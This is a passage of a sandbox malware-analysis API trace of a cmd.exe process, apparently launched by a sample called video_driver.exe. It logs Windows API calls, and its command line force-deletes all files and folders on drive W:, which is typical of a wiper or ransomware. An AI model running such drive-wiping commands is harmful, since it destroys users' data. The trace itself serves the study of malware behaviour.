0x3f33d0 [0065.856] GetProcessHeap () returned 0x3e0000 [0065.856] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f33d0, Size=0x12) returned 0x3f33d0 [0065.856] GetProcessHeap () returned 0x3e0000 [0065.856] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f33d0) returned 0x12 [0065.856] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0065.856] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0065.856] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0065.856] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0065.856] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0065.856] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0065.857] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0065.857] GetProcessHeap () returned 0x3e0000 [0065.857] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3f33f0 [0065.858] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0065.858] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0065.859] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0065.859] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0065.859] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0065.859] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0065.859] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0065.859] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0065.859] GetProcessHeap () returned 0x3e0000 [0065.859] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3410 [0065.859] GetProcessHeap () returned 0x3e0000 [0065.859] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x14) returned 0x3f3470 [0065.860] GetProcessHeap () returned 0x3e0000 [0065.860] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x20) returned 0x3f57e0 [0065.862] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0065.864] GetFullPathNameW (in: lpFileName="V:", nBufferLength=0x208, lpBuffer=0x36f680, lpFilePart=0x36f42c | out: lpBuffer="V:\\", lpFilePart=0x36f42c*=0x0) returned 0x3 [0065.865] wcsncmp (_String1="V:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -6 [0065.870] GetFileAttributesW (lpFileName="V:\\" (normalized: "v:")) returned 0xffffffff [0065.870] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.870] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.870] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.871] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.871] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.871] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.871] SetConsoleInputExeNameW () returned 0x1 [0065.871] GetConsoleOutputCP () returned 0x1b5 [0065.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.872] exit (_Code=0) Process: id = "43" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42036000" os_pid = "0xbb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"W:\" del /f /s /q \"W:\" & FOR /D %p IN (\"W:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 71 os_tid = 0xb24 [0065.969] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f9ac | out: lpSystemTimeAsFileTime=0x32f9ac*(dwLowDateTime=0x5243820, dwHighDateTime=0x1d62400)) [0065.969] GetCurrentProcessId () returned 0xbb0 [0065.969] GetCurrentThreadId () returned 0xb24 [0065.969] GetTickCount () returned 0x1147ee1 [0065.969] QueryPerformanceCounter (in: lpPerformanceCount=0x32f9a4 | out: lpPerformanceCount=0x32f9a4*=18610229830) returned 1 [0065.970] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0065.970] __set_app_type (_Type=0x1) [0065.971] __p__fmode () returned 0x770331f4 [0065.971] __p__commode () returned 0x770331fc [0065.971] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0065.971] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0065.971] GetCurrentThreadId () returned 0xb24 [0065.971] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb24) returned 0x60 [0065.972] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.972] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0065.972] SetThreadUILanguage (LangId=0x0) returned 0x409 [0065.972] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0065.972] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32f93c | out: phkResult=0x32f93c*=0x0) returned 0x2 [0065.973] VirtualQuery (in: lpAddress=0x32f973, lpBuffer=0x32f90c, dwLength=0x1c | out: lpBuffer=0x32f90c*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.973] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32f90c, dwLength=0x1c | out: lpBuffer=0x32f90c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0065.973] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32f90c, dwLength=0x1c | out: lpBuffer=0x32f90c*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0065.973] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32f90c, dwLength=0x1c | out: lpBuffer=0x32f90c*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0065.973] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32f90c, dwLength=0x1c | out: lpBuffer=0x32f90c*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0065.973] GetConsoleOutputCP () returned 0x1b5 [0065.973] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.973] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0065.973] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.973] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0065.974] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.974] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0065.974] _get_osfhandle (_FileHandle=1) returned 0x7 [0065.974] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0065.975] _get_osfhandle (_FileHandle=0) returned 0x3 [0065.975] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0065.975] GetEnvironmentStringsW () returned 0x6220f8* [0065.975] GetProcessHeap () returned 0x610000 [0065.975] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xaca) returned 0x622bd0 [0065.975] FreeEnvironmentStringsW (penv=0x6220f8) returned 1 [0065.976] GetProcessHeap () returned 0x610000 [0065.976] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x621898 [0065.976] GetEnvironmentStringsW () returned 0x6220f8* [0065.976] GetProcessHeap () returned 0x610000 [0065.976] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xaca) returned 0x6236a8 [0065.976] FreeEnvironmentStringsW (penv=0x6220f8) returned 1 [0065.976] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e8ac | out: phkResult=0x32e8ac*=0x68) returned 0x0 [0065.976] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x0, lpData=0x32e8b8*=0x0, lpcbData=0x32e8b0*=0x1000) returned 0x2 [0065.976] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x4, lpData=0x32e8b8*=0x1, lpcbData=0x32e8b0*=0x4) returned 0x0 [0065.976] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x0, lpData=0x32e8b8*=0x1, lpcbData=0x32e8b0*=0x1000) returned 0x2 [0065.976] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x4, lpData=0x32e8b8*=0x0, lpcbData=0x32e8b0*=0x4) returned 0x0 [0065.976] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x4, lpData=0x32e8b8*=0x40, lpcbData=0x32e8b0*=0x4) returned 0x0 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x4, lpData=0x32e8b8*=0x40, lpcbData=0x32e8b0*=0x4) returned 0x0 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x0, lpData=0x32e8b8*=0x40, lpcbData=0x32e8b0*=0x1000) returned 0x2 [0065.977] RegCloseKey (hKey=0x68) returned 0x0 [0065.977] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e8ac | out: phkResult=0x32e8ac*=0x68) returned 0x0 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x0, lpData=0x32e8b8*=0x40, lpcbData=0x32e8b0*=0x1000) returned 0x2 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x4, lpData=0x32e8b8*=0x1, lpcbData=0x32e8b0*=0x4) returned 0x0 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x0, lpData=0x32e8b8*=0x1, lpcbData=0x32e8b0*=0x1000) returned 0x2 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x4, lpData=0x32e8b8*=0x0, lpcbData=0x32e8b0*=0x4) returned 0x0 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x4, lpData=0x32e8b8*=0x9, lpcbData=0x32e8b0*=0x4) returned 0x0 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x4, lpData=0x32e8b8*=0x9, lpcbData=0x32e8b0*=0x4) returned 0x0 [0065.977] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e8b4, lpData=0x32e8b8, lpcbData=0x32e8b0*=0x1000 | out: lpType=0x32e8b4*=0x0, lpData=0x32e8b8*=0x9, lpcbData=0x32e8b0*=0x1000) returned 0x2 [0065.977] RegCloseKey (hKey=0x68) returned 0x0 [0065.977] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6b [0065.977] srand (_Seed=0x5eb34b6b) [0065.977] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"W:\" del /f /s /q \"W:\" & FOR /D %p IN (\"W:\") DO rmdir \"%p\" /s /q" [0065.978] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"W:\" del /f /s /q \"W:\" & FOR /D %p IN (\"W:\") DO rmdir \"%p\" /s /q" [0065.978] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.978] GetProcessHeap () returned 0x610000 [0065.978] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x6220f8 [0065.978] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x622100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0065.978] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0065.978] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.978] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.978] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0065.978] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0065.979] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0065.979] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0065.979] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0065.979] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0065.979] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0065.979] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.979] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0065.979] GetProcessHeap () returned 0x610000 [0065.979] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622bd0 | out: hHeap=0x610000) returned 1 [0065.979] GetEnvironmentStringsW () returned 0x622310* [0065.979] GetProcessHeap () returned 0x610000 [0065.979] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xae2) returned 0x624c70 [0065.979] FreeEnvironmentStringsW (penv=0x622310) returned 1 [0065.979] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0065.979] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.979] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0065.979] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0065.979] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0065.980] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0065.980] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0065.980] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0065.980] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0065.980] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0065.980] GetProcessHeap () returned 0x610000 [0065.980] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x54) returned 0x6217c8 [0065.980] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f678 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f678, lpFilePart=0x32f674 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f674*="Desktop") returned 0x25 [0065.980] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.980] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f3f4 | out: lpFindFileData=0x32f3f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x625760 [0065.980] FindClose (in: hFindFile=0x625760 | out: hFindFile=0x625760) returned 1 [0065.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f3f4 | out: lpFindFileData=0x32f3f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x625760 [0065.981] FindClose (in: hFindFile=0x625760 | out: hFindFile=0x625760) returned 1 [0065.981] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0065.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f3f4 | out: lpFindFileData=0x32f3f4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x625760 [0065.981] FindClose (in: hFindFile=0x625760 | out: hFindFile=0x625760) returned 1 [0065.981] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0065.981] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0065.981] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0065.982] GetProcessHeap () returned 0x610000 [0065.982] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624c70 | out: hHeap=0x610000) returned 1 [0065.982] GetEnvironmentStringsW () returned 0x624180* [0065.982] GetProcessHeap () returned 0x610000 [0065.982] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x625fa0 [0065.982] FreeEnvironmentStringsW (penv=0x624180) returned 1 [0065.982] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0065.982] GetProcessHeap () returned 0x610000 [0065.982] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6217c8 | out: hHeap=0x610000) returned 1 [0065.982] GetProcessHeap () returned 0x610000 [0065.982] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x626ae0 [0065.983] GetProcessHeap () returned 0x610000 [0065.983] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa0) returned 0x622e50 [0065.983] GetProcessHeap () returned 0x610000 [0065.983] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626ae0 | out: hHeap=0x610000) returned 1 [0065.983] GetConsoleOutputCP () returned 0x1b5 [0065.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0065.985] GetUserDefaultLCID () returned 0x409 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f7b8, cchData=128 | out: lpLCData="0") returned 2 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f7b8, cchData=128 | out: lpLCData="0") returned 2 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f7b8, cchData=128 | out: lpLCData="1") returned 2 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0065.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0065.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0065.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0065.987] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0065.988] GetProcessHeap () returned 0x610000 [0065.988] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x622ef8 [0065.988] GetConsoleTitleW (in: lpConsoleTitle=0x622ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0065.989] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0065.989] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0065.989] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0065.989] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0065.989] GetProcessHeap () returned 0x610000 [0065.989] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x626ae0 [0065.990] GetProcessHeap () returned 0x610000 [0065.990] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4008) returned 0x62aaf8 [0065.990] GetProcessHeap () returned 0x610000 [0065.990] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a) returned 0x6257e0 [0065.990] GetEnvironmentVariableW (in: lpName="p IN (\"W", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0065.990] _wcsicmp (_String1="p IN (\"W", _String2="CD") returned 13 [0065.990] _wcsicmp (_String1="p IN (\"W", _String2="ERRORLEVEL") returned 11 [0065.990] _wcsicmp (_String1="p IN (\"W", _String2="CMDEXTVERSION") returned 13 [0065.990] _wcsicmp (_String1="p IN (\"W", _String2="CMDCMDLINE") returned 13 [0065.990] _wcsicmp (_String1="p IN (\"W", _String2="DATE") returned 12 [0065.990] _wcsicmp (_String1="p IN (\"W", _String2="TIME") returned -4 [0065.990] _wcsicmp (_String1="p IN (\"W", _String2="RANDOM") returned -2 [0065.990] _wcsicmp (_String1="p IN (\"W", _String2="HIGHESTNUMANODENUMBER") returned 8 [0065.990] GetProcessHeap () returned 0x610000 [0065.990] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6257e0 | out: hHeap=0x610000) returned 1 [0065.990] GetProcessHeap () returned 0x610000 [0065.990] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62aaf8 | out: hHeap=0x610000) returned 1 [0065.991] GetProcessHeap () returned 0x610000 [0065.991] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4008) returned 0x62aaf8 [0065.991] GetProcessHeap () returned 0x610000 [0065.991] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62aaf8 | out: hHeap=0x610000) returned 1 [0065.991] GetProcessHeap () returned 0x610000 [0065.991] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626ae0 | out: hHeap=0x610000) returned 1 [0065.991] _wcsicmp (_String1="if", _String2=")") returned 64 [0065.991] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0065.991] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0065.991] _wcsicmp (_String1="IF", _String2="if") returned 0 [0065.991] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0065.991] GetProcessHeap () returned 0x610000 [0065.991] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x623110 [0065.991] GetProcessHeap () returned 0x610000 [0065.991] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x61ffc0 [0065.992] GetProcessHeap () returned 0x610000 [0065.992] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x20) returned 0x6257e0 [0065.992] GetProcessHeap () returned 0x610000 [0065.992] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6257e0, Size=0x16) returned 0x621800 [0065.993] GetProcessHeap () returned 0x610000 [0065.993] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x621800) returned 0x16 [0065.993] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0065.993] GetProcessHeap () returned 0x610000 [0065.993] 